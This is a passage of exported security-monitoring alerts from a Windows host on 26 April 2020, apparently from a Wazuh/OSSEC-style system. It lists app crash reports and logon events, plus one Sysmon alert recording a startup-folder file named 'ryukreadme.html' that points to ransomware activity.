account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:17:17.872",4,"Summary event of the report's signatures",,"""Fault bucket 1249619647368064933, type 5 +Event Name: FaultTolerantHeap +Response: Not available +Cab Id: 0 + +Problem signature: +P1: RuntimeBroker.exe +P2: 10.0.18362.1 +P3: 4539D5A0 +P4: ffffbaad +P5: +P6: +P7: +P8: +P9: +P10: + +Attached files: +\\?\C:\Windows\SERVIC~1\LOCALS~1\AppData\Local\Temp\FTH7A93.tmp\fthempty.txt +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER7A94.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER7AA4.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER7AFA.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER7CB0.tmp.txt + +These files may be available here: + + +Analysis symbol: +Rechecking for solution: 0 +Report Id: c226da71-0f6f-4e54-87eb-2f7a616fd75c +Report Status: 268435456 +Hashed bucket: 83ecd02fadfbabe731578a72d1b8efa5 +Cab Guid: 0""" +"Apr 26, 2020 @ 10:17:17.869",4,"Summary event of the report's signatures",,"""Fault bucket 1622308077343013045, type 5 +Event Name: BEX +Response: Not available +Cab Id: 0 + +Problem signature: +P1: OneDrive.exe +P2: 19.232.1124.10 +P3: 1482ea94 +P4: ntdll.dll +P5: 10.0.18362.719 +P6: 832e7bce +P7: 00088d30 +P8: c0000409 +P9: 0000000a +P10: + +Attached files: +\\?\C:\Users\John Williams\AppData\Local\Microsoft\OneDrive\logs\Personal\TraceCurrent.1124.0010.etl +\\?\C:\Users\John Williams\AppData\Local\Microsoft\OneDrive\logs\Personal\SyncEngine-2020-04-26.1016.6176.1.aodl +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER53D8.tmp.dmp +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER6686.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER6762.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER67AE.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER687A.tmp.txt + +These files may be available here: +\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_OneDrive.exe_5f9f888f92a070788b9455eacf35150c2a872_07f528d8_a4b2d373-6777-4a11-85be-87e669554117 + +Analysis symbol: +Rechecking for solution: 0 +Report Id: 38caffed-687f-4951-8b4b-1f37a83ef62e +Report Status: 268435456 +Hashed bucket: c88d0b45f49ff7ddf6839899da46f8b5 +Cab Guid: 0""" +"Apr 26, 2020 @ 10:17:16.521",9,"Windows Application error event",,"""Faulting application name: RuntimeBroker.exe, version: 10.0.18362.1, time stamp: 0x4539d5a0 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0x1104 +Faulting application start time: 0x01d61bb3a9b2df74 +Faulting application path: C:\Windows\System32\RuntimeBroker.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: 35b39479-8c80-4e92-bdc6-c7341d069b33 +Faulting package full name: Microsoft.Windows.Cortana_1.13.0.18362_neutral_neutral_cw5n1h2txyewy +Faulting package-relative application ID: runtimebroker07f4358a809ac99a64a67c1""" +"Apr 26, 2020 @ 10:17:16.433",4,"Summary event of the report's signatures",,"""Fault bucket 2151335052192812308, type 5 +Event Name: MoAppCrash +Response: Not available +Cab Id: 0 + +Problem signature: +P1: Microsoft.XboxGamingOverlay_3.38.25003.0_x64__8wekyb3d8bbwe +P2: praid:App +P3: 10.0.18362.1 +P4: 2beeabda +P5: ntdll.dll +P6: 10.0.18362.719 +P7: 64d10ee0 +P8: c0000005 +P9: 000000000003b890 +P10: + +Attached files: +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER63E5.tmp.dmp +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER656D.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER659C.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER65C8.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER65E8.tmp.txt + +These files may be available here: +\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.XboxGa_44258378a6d5e98bf439dc31a9d6bf4da030a7e7_f472b3e4_fd92b24d-08ed-45fa-8232-83aeaeb2fcd2 + +Analysis symbol: +Rechecking for solution: 0 +Report Id: 7e8853f7-8f35-4707-b507-57722a9079e7 +Report Status: 268435456 +Hashed bucket: cad575abb2ada21baddb13d4eacc8d14 +Cab Guid: 0""" +"Apr 26, 2020 @ 10:17:16.364",9,"Windows Application error event",,"""Volume Shadow Copy Service information: The COM Server with CLSID {e579ab5f-1cc4-44b4-bed9-de0991ff0623} and name Coordinator cannot be started. [0x80070005, Access is denied. +] """ +"Apr 26, 2020 @ 10:17:14.507",4,"Summary event of the report's signatures",,"""Fault bucket 1657758300517278340, type 4 +Event Name: APPCRASH +Response: Not available +Cab Id: 0 + +Problem signature: +P1: smartscreen.exe +P2: 10.0.18362.1 +P3: cd4269a6 +P4: ntdll.dll +P5: 10.0.18362.719 +P6: 64d10ee0 +P7: c0000005 +P8: 000000000003b890 +P9: +P10: + +Attached files: +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER53F7.tmp.dmp +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER58BB.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER5A23.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER5A79.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER5AE7.tmp.txt + +These files may be available here: +\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_smartscreen.exe_a7811b8033dd303c40b87ed1ad6c29cf39727bee_5d80af6c_25f4ee7e-0dba-4c49-8c2a-8cde6ff83308 + +Analysis symbol: +Rechecking for solution: 0 +Report Id: bada2dbd-4f2e-43f0-8ef1-f8bfb7212112 +Report Status: 268435456 +Hashed bucket: 0424f099e54e519237018a6421c9a284 +Cab Guid: 0""" +"Apr 26, 2020 @ 10:17:14.491",4,"Summary event of the report's signatures",,"""Fault bucket 1229570998794408688, type 5 +Event Name: FaultTolerantHeap +Response: Not available +Cab Id: 0 + +Problem signature: +P1: BackgroundTransferHost.exe +P2: 10.0.18362.1 +P3: 2BEEABDA +P4: ffffbaad +P5: +P6: +P7: +P8: +P9: +P10: + +Attached files: +\\?\C:\Windows\SERVIC~1\LOCALS~1\AppData\Local\Temp\FTH6207.tmp\fthempty.txt +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER6208.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER6228.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER627A.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER62E8.tmp.txt + +These files may be available here: + + +Analysis symbol: +Rechecking for solution: 0 +Report Id: 1f7bb328-9945-4e8f-b2e1-ccf01acea4a4 +Report Status: 268435456 +Hashed bucket: f00ea1b2ce1400058110504f114352f0 +Cab Guid: 0""" +"Apr 26, 2020 @ 10:17:12.323",10,"Multiple Windows error Application events",,"""Faulting application name: BackgroundTransferHost.exe, version: 10.0.18362.1, time stamp: 0x2beeabda +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0x1b48 +Faulting application start time: 0x01d61bb3b3d7df03 +Faulting application path: C:\Windows\system32\BackgroundTransferHost.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: 7e8853f7-8f35-4707-b507-57722a9079e7 +Faulting package full name: Microsoft.XboxGamingOverlay_3.38.25003.0_x64__8wekyb3d8bbwe +Faulting package-relative application ID: App""" +"Apr 26, 2020 @ 10:17:10.431",4,"Summary event of the report's signatures",,"""Fault bucket 1296249511987065443, type 5 +Event Name: FaultTolerantHeap +Response: Not available +Cab Id: 0 + +Problem signature: +P1: smartscreen.exe +P2: 10.0.18362.1 +P3: CD4269A6 +P4: ffffbaad +P5: +P6: +P7: +P8: +P9: +P10: + +Attached files: +\\?\C:\Windows\SERVIC~1\LOCALS~1\AppData\Local\Temp\FTH51A8.tmp\fthempty.txt +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER51B9.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER51C9.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER5259.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER5306.tmp.txt + +These files may be available here: + + +Analysis symbol: +Rechecking for solution: 0 +Report Id: 9a5af2b2-6e76-47de-95c3-15f292b3654e +Report Status: 268435456 +Hashed bucket: d71934d1179b2fac11fd341036433263 +Cab Guid: 0""" +"Apr 26, 2020 @ 10:17:10.329",9,"Windows Application error event",,"""Faulting application name: smartscreen.exe, version: 10.0.18362.1, time stamp: 0xcd4269a6 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0x1028 +Faulting application start time: 0x01d61bb3b0d441e8 +Faulting application path: C:\Windows\System32\smartscreen.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: bada2dbd-4f2e-43f0-8ef1-f8bfb7212112 +Faulting package full name: +Faulting package-relative application ID: """ +"Apr 26, 2020 @ 10:17:10.316",4,"Summary event of the report's signatures",,"""Fault bucket 1774762671288966134, type 5 +Event Name: MoBEX +Response: Not available +Cab Id: 0 + +Problem signature: +P1: Microsoft.XboxGamingOverlay_3.38.25003.0_x64__8wekyb3d8bbwe +P2: praid:App +P3: 3.38.2002.25003 +P4: 5e5615f2 +P5: ucrtbase.dll +P6: 10.0.18362.387 +P7: 4361b720 +P8: 000000000006db8e +P9: c0000409 +P10: 0000000000000007 + +Attached files: +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER3246.tmp.dmp +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER39B9.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER3A47.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER3AF7.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER3BE2.tmp.txt + +These files may be available here: +\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.XboxGa_3b3227e216aa2c869289ee6bde534bb1e47de_f472b3e4_9d7855b8-f7fe-4752-b738-35b3c6db04e2 + +Analysis symbol: +Rechecking for solution: 0 +Report Id: 440a54a0-304d-4b82-9310-8d86ef000ed6 +Report Status: 268435456 +Hashed bucket: 8d5ad5ac411b2e89e8a1393f16cd5bf6 +Cab Guid: 0""" +"Apr 26, 2020 @ 10:17:09.403",9,"Windows Application error event",,"""Faulting application name: OneDrive.exe, version: 19.232.1124.10, time stamp: 0x1482ea94 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x832e7bce +Exception code: 0xc0000409 +Fault offset: 0x00088d30 +Faulting process id: 0x1820 +Faulting application start time: 0x01d61bb3b1308dc8 +Faulting application path: C:\Users\John Williams\AppData\Local\Microsoft\OneDrive\OneDrive.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: 38caffed-687f-4951-8b4b-1f37a83ef62e +Faulting package full name: +Faulting package-relative application ID: """ +"Apr 26, 2020 @ 10:17:07.320",12,"Sysmon - Suspicious Process - explorer.exe","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:16:37.244055700Z"",""eventRecordID"":""1024"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-04-26 10:16:37.011\r\nProcessGuid: {df9fc3d3-5f85-5ea5-0000-0010fecb0e00}\r\nProcessId: 8948\r\nImage: C:\\Windows\\explorer.exe\r\nFileVersion: 10.0.18362.693 (WinBuild.160101.0800)\r\nDescription: Windows Explorer\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: EXPLORER.EXE\r\nCommandLine: explorer.exe /LOADSAVEDWINDOWS\r\nCurrentDirectory: C:\\Windows\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-5f4e-5ea5-0000-002083730300}\r\nLogonId: 0x37383\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=F7DC8A74E30E08B9510380274CFB9288,SHA256=C5E88D778C0B118D49BEF467ED059C09B61DEEA505D2A3D5CA1DCC0A5CDF752F,IMPHASH=FE6F775DD0C72FFD106F56930C60A452\r\nParentProcessGuid: {df9fc3d3-5f7f-5ea5-0000-0010397f0e00}\r\nParentProcessId: 8684\r\nParentImage: C:\\Windows\\System32\\sihost.exe\r\nParentCommandLine: sihost.exe\""""},""eventdata"":{""utcTime"":""2020-04-26 10:16:37.011"",""processGuid"":""{df9fc3d3-5f85-5ea5-0000-0010fecb0e00}"",""processId"":""8948"",""image"":""C:\\\\Windows\\\\explorer.exe"",""fileVersion"":""10.0.18362.693 (WinBuild.160101.0800)"",""description"":""Windows Explorer"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""EXPLORER.EXE"",""commandLine"":""explorer.exe /LOADSAVEDWINDOWS"",""currentDirectory"":""C:\\\\Windows\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-5f4e-5ea5-0000-002083730300}"",""logonId"":""0x37383"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=F7DC8A74E30E08B9510380274CFB9288,SHA256=C5E88D778C0B118D49BEF467ED059C09B61DEEA505D2A3D5CA1DCC0A5CDF752F,IMPHASH=FE6F775DD0C72FFD106F56930C60A452"",""parentProcessGuid"":""{df9fc3d3-5f7f-5ea5-0000-0010397f0e00}"",""parentProcessId"":""8684"",""parentImage"":""C:\\\\Windows\\\\System32\\\\sihost.exe"",""parentCommandLine"":""sihost.exe""}}}","""Process Create: +RuleName: +UtcTime: 2020-04-26 10:16:37.011 +ProcessGuid: {df9fc3d3-5f85-5ea5-0000-0010fecb0e00} +ProcessId: 8948 +Image: C:\Windows\explorer.exe +FileVersion: 10.0.18362.693 (WinBuild.160101.0800) +Description: Windows Explorer +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: EXPLORER.EXE +CommandLine: explorer.exe /LOADSAVEDWINDOWS +CurrentDirectory: C:\Windows\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-5f4e-5ea5-0000-002083730300} +LogonId: 0x37383 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=F7DC8A74E30E08B9510380274CFB9288,SHA256=C5E88D778C0B118D49BEF467ED059C09B61DEEA505D2A3D5CA1DCC0A5CDF752F,IMPHASH=FE6F775DD0C72FFD106F56930C60A452 +ParentProcessGuid: {df9fc3d3-5f7f-5ea5-0000-0010397f0e00} +ParentProcessId: 8684 +ParentImage: C:\Windows\System32\sihost.exe +ParentCommandLine: sihost.exe""" +"Apr 26, 2020 @ 10:17:06.577",9,"Windows Application error event",,"""Faulting application name: GameBar.exe, version: 3.38.2002.25003, time stamp: 0x5e5615f2 +Faulting module name: ucrtbase.dll, version: 10.0.18362.387, time stamp: 0x4361b720 +Exception code: 0xc0000409 +Fault offset: 0x000000000006db8e +Faulting process id: 0x1980 +Faulting application start time: 0x01d61bb3b2703aee +Faulting application path: C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_3.38.25003.0_x64__8wekyb3d8bbwe\GameBar.exe +Faulting module path: C:\Windows\System32\ucrtbase.dll +Report Id: 440a54a0-304d-4b82-9310-8d86ef000ed6 +Faulting package full name: Microsoft.XboxGamingOverlay_3.38.25003.0_x64__8wekyb3d8bbwe +Faulting package-relative application ID: App""" +"Apr 26, 2020 @ 10:17:04.550",4,"Summary event of the report's signatures",,"""Fault bucket 2039954016612560073, type 5 +Event Name: MoAppCrash +Response: Not available +Cab Id: 0 + +Problem signature: +P1: Microsoft.Windows.StartMenuExperienceHost_10.0.18362.449_neutral_neutral_cw5n1h2txyewy +P2: praid:App +P3: 0.0.0.0 +P4: 5d65fb6a +P5: ntdll.dll +P6: 10.0.18362.719 +P7: 64d10ee0 +P8: c0000005 +P9: 000000000003b890 +P10: + +Attached files: +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERCEB.tmp.dmp +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER147E.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER152B.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER15E8.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER1676.tmp.txt + +These files may be available here: +\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_a517d33c7366c0ce7a4123d7394238d757255f3_df0fc392_af1e1e87-f07b-4530-9ff2-e8b6c0c3dcb8 + +Analysis symbol: +Rechecking for solution: 0 +Report Id: 260ea8f4-adf4-4f0d-9e46-8111c7d560d2 +Report Status: 268435456 +Hashed bucket: 28406508ca41bd6f7c4f5f5eb652acc9 +Cab Guid: 0""" +"Apr 26, 2020 @ 10:17:04.536",4,"Summary event of the report's signatures",,"""Fault bucket 1416303988536420219, type 4 +Event Name: APPCRASH +Response: Not available +Cab Id: 0 + +Problem signature: +P1: sihost.exe +P2: 10.0.18362.1 +P3: e9587576 +P4: ntdll.dll +P5: 10.0.18362.719 +P6: 64d10ee0 +P7: c0000005 +P8: 000000000003b890 +P9: +P10: + +Attached files: +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER4FC.tmp.dmp +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER972.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER9E0.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERA2D.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERBF4.tmp.txt + +These files may be available here: +\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_sihost.exe_8e8a7b3a9516eb3355c5fecfc9f15289a25db9f_b8434f32_89841dbc-f4e5-45fc-b768-3fa2593fc0bd + +Analysis symbol: +Rechecking for solution: 0 +Report Id: 4493f23c-1383-4193-92c2-789b4c7cd9c2 +Report Status: 268435456 +Hashed bucket: 2530936a9b385b37a3a7b8f942aea77b +Cab Guid: 0""" +"Apr 26, 2020 @ 10:17:02.850",4,"Summary event of the report's signatures",,"""Fault bucket 2258116575438203359, type 5 +Event Name: FaultTolerantHeap +Response: Not available +Cab Id: 0 + +Problem signature: +P1: StartMenuExperienceHost.exe +P2: 0.0.0.0 +P3: 5D65FB6A +P4: ffffbaad +P5: +P6: +P7: +P8: +P9: +P10: + +Attached files: +\\?\C:\Windows\SERVIC~1\LOCALS~1\AppData\Local\Temp\FTH913.tmp\fthempty.txt +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER914.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER963.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER9CE.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERA8C.tmp.txt + +These files may be available here: + + +Analysis symbol: +Rechecking for solution: 0 +Report Id: 59f7bd84-49ca-4b99-b1c9-a6339bb10df8 +Report Status: 268435456 +Hashed bucket: ea03c7813111befe0f56710fb46a69df +Cab Guid: 0""" +"Apr 26, 2020 @ 10:16:50.899",9,"Windows Application error event",,"""Faulting application name: StartMenuExperienceHost.exe, version: 0.0.0.0, time stamp: 0x5d65fb6a +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0x10fc +Faulting application start time: 0x01d61bb3a7db3186 +Faulting application path: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: 260ea8f4-adf4-4f0d-9e46-8111c7d560d2 +Faulting package full name: Microsoft.Windows.StartMenuExperienceHost_10.0.18362.449_neutral_neutral_cw5n1h2txyewy +Faulting package-relative application ID: App""" +"Apr 26, 2020 @ 10:16:50.378",9,"Windows Application error event",,"""Volume Shadow Copy Service information: The COM Server with CLSID {e579ab5f-1cc4-44b4-bed9-de0991ff0623} and name Coordinator cannot be started. [0x80070005, Access is denied. +] """ +"Apr 26, 2020 @ 10:16:46.081",9,"Windows Application error event",,"""Faulting application name: sihost.exe, version: 10.0.18362.1, time stamp: 0xe9587576 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0xdd4 +Faulting application start time: 0x01d61bb3a566fdbc +Faulting application path: C:\Windows\system32\sihost.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: 4493f23c-1383-4193-92c2-789b4c7cd9c2 +Faulting package full name: +Faulting package-relative application ID: """ +"Apr 26, 2020 @ 10:16:39.896",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:16:06.575",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:16:02.231",5,"License Activation (slui.exe) failed",,"""License Activation (slui.exe) failed with the following error code: +hr=0x803F7001 +Command-line arguments: +RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2b1f36bb-c1cd-4306-bf5c-a0367c2d97d8;NotificationInterval=1440;Trigger=TimerEvent""" +"Apr 26, 2020 @ 10:16:01.886",5,"License Activation (slui.exe) failed",,"""License Activation (slui.exe) failed with the following error code: +hr=0x803F7001 +Command-line arguments: +RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2b1f36bb-c1cd-4306-bf5c-a0367c2d97d8;NotificationInterval=1440;Trigger=UserLogon;SessionId=1""" +"Apr 26, 2020 @ 10:16:01.217",12,"ATT&CK T1060: Potential Persistence Method via Startup Folder","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""11"",""version"":""2"",""level"":""4"",""task"":""11"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:58.872807000Z"",""eventRecordID"":""865"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""File created:\r\nRuleName: T1023\r\nUtcTime: 2020-04-26 10:15:58.858\r\nProcessGuid: {df9fc3d3-5f49-5ea5-0000-00100efa0100}\r\nProcessId: 2148\r\nImage: C:\\Program Files (x86)\\ossec-agent\\ossec-agent.exe\r\nTargetFilename: C:\\Program Files (x86)\\ossec-agent\\queue\\diff\\local\\users\\john williams\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\ryukreadme.html\\last-entry\r\nCreationUtcTime: 2020-04-26 10:15:58.858\""""},""eventdata"":{""ruleName"":""T1023"",""utcTime"":""2020-04-26 10:15:58.858"",""processGuid"":""{df9fc3d3-5f49-5ea5-0000-00100efa0100}"",""processId"":""2148"",""image"":""C:\\\\Program Files (x86)\\\\ossec-agent\\\\ossec-agent.exe"",""targetFilename"":""C:\\\\Program Files (x86)\\\\ossec-agent\\\\queue\\\\diff\\\\local\\\\users\\\\john williams\\\\appdata\\\\roaming\\\\microsoft\\\\windows\\\\start menu\\\\programs\\\\startup\\\\ryukreadme.html\\\\last-entry"",""creationUtcTime"":""2020-04-26 10:15:58.858""}}}","""File created: +RuleName: T1023 +UtcTime: 2020-04-26 10:15:58.858 +ProcessGuid: {df9fc3d3-5f49-5ea5-0000-00100efa0100} +ProcessId: 2148 +Image: C:\Program Files (x86)\ossec-agent\ossec-agent.exe +TargetFilename: C:\Program Files (x86)\ossec-agent\queue\diff\local\users\john williams\appdata\roaming\microsoft\windows\start menu\programs\startup\ryukreadme.html\last-entry +CreationUtcTime: 2020-04-26 10:15:58.858""" +"Apr 26, 2020 @ 10:15:57.231",9,"Windows Application error event",,"""Failure to load the application settings for package Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy. Error Code: -2147023879""" +"Apr 26, 2020 @ 10:15:56.574",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (66)",, +"Apr 26, 2020 @ 10:15:53.411",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: 